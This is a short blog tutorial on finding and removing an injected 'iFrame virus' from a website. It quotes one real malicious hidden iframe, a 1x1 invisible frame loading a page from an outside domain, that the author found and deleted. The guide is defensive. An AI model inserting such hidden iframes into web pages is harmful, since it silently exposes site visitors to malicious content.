How to Remove iFrame Virus from Website

How to Remove iFrame Virus from Website

You might be reading this as your website or blog was identified to contain a virus or a malicious script that has been caught by any Antivirus software capable of scanning web pages and web based scripts. Antivirus software like ESET, Avast etc. have excellent web page scanning system and it can easily alert your users that the site contains malicious content and needs to be avoided.

These virus could have got into your website as a result of hacking or uploading content from an unprotected PC. The basic steps to remove or identify threats on your web hosting and website are:

  • Scan the website online from VirusTotal.com
  • if the results are clean then the website should not have any infections.

If you want to be super sure, you may even download the files through FTP and scan them offline, clean and re upload to the web server. But in some cases, scanning will not identify threats like iFrame Virus code that could be embedded within your website code or any particular web page. In such cases follow the below method to sanitize your website.

How to Remove iFrame Virus from Website

How to Remove iFrame Virus from Website

How to Remove iFrame Virus from Website

Identify the path of the file that has been detected by the antivirus web page scanning software that throws an error to your readers or you when the website is browsed on any browser. Download the page and view the source code – search and identity the keyword “iFrame” and inspect if the iframe codes are part of the code you inserted on your webpage, if not remove them as they could be malicious pieces of codes inserted on your webpage to ping some other server etc.

an example of malicious code i found on my webpage was:

 <iframe src=”http://predeterminekcf.info/main.php?page=e4a6f1dda2879502”  width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

Once this line was removed from my webpage, the server was clean and Antivirus clients were not identifying any virus on launching the website. As soon as you sanitize your website, please make sure you change the FTP passwords and raise a request to your webhost to inspect your web hosting account FTP for any viruses as a proactive measure.

Hope this tutorial was helpful, please let me know your experience, feedback and questions. I will be more than happy to help you!

One Response

  1. Michael Jackson Lyri March 14, 2012